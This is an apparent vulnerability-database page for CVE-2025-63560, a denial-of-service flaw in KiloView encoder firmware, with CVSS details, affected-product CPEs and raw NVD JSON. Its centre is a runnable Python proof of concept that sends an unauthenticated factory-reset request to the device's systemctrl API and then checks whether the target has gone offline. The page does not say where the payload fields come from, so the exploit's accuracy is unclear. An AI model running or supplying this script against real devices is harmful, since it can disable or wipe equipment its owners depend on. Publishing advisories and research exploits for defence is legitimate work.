Security Vulnerability Report
中文
CVE-2025-63560 CVSS 7.5 HIGH

CVE-2025-63560

Published: 2025-11-06 17:15:46
Last Modified: 2026-02-04 21:16:07

Description

An issue in KiloView Dual Channel 4k HDMI & 3G-SDI HEVC Video Encoder Firmware v.1.20.0006 allows a remote attacker to cause a denial of service via the systemctrl API System/reFactory component.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:kiloview:e3_firmware:1.20.0006:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:kiloview:e3:-:*:*:*:*:*:*:* - NOT VULNERABLE
KiloView Dual Channel 4k HDMI & 3G-SDI HEVC Video Encoder Firmware v.1.20.0006

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys import time # CVE-2025-63560 PoC # Target: KiloView Dual Channel 4k HDMI & 3G-SDI HEVC Video Encoder Firmware v.1.20.0006 # Vulnerability: System/reFactory component in systemctrl API allows DoS without authentication def exploit(target_ip, target_port=80): """ Exploit for CVE-2025-63560 Sends malicious request to systemctrl API System/reFactory endpoint """ url = f"http://{target_ip}:{target_port}/systemctrl/api/System/reFactory" headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-63560-PoC)' } # Malicious payload that triggers DoS condition payload = { 'action': 'reset', 'type': 'factory', 'params': { 'force': True, 'timeout': 0 # Invalid timeout value } } try: print(f"[*] Sending exploit payload to {url}") response = requests.post(url, json=payload, headers=headers, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Body: {response.text}") # Verify if device is unresponsive time.sleep(3) check_url = f"http://{target_ip}:{target_port}/" try: health_check = requests.get(check_url, timeout=5) print(f"[*] Device still responsive") except requests.exceptions.RequestException: print(f"[!] Device appears to be non-responsive - DoS successful") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 exploit(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63560", "sourceIdentifier": "[email protected]", "published": "2025-11-06T17:15:46.047", "lastModified": "2026-02-04T21:16:07.390", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in KiloView Dual Channel 4k HDMI & 3G-SDI HEVC Video Encoder Firmware v.1.20.0006 allows a remote attacker to cause a denial of service via the systemctrl API System/reFactory component."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:kiloview:e3_firmware:1.20.0006:*:*:*:*:*:*:*", "matchCriteriaId": "166440A3-C594-442D-9CAC-EB75F55865C8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:kiloview:e3:-:*:*:*:*:*:*:*", "matchCriteriaId": "5860DED9-EF39-4570-A839-F2DF8114E685"}]}]}], "references": [{"url": "http://kiloview.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://darrinj99.github.io/writeups/kiloview_e3.html", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Darrinj99/Vuln-Writeups-/blob/main/CVE-2025-63560/README.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}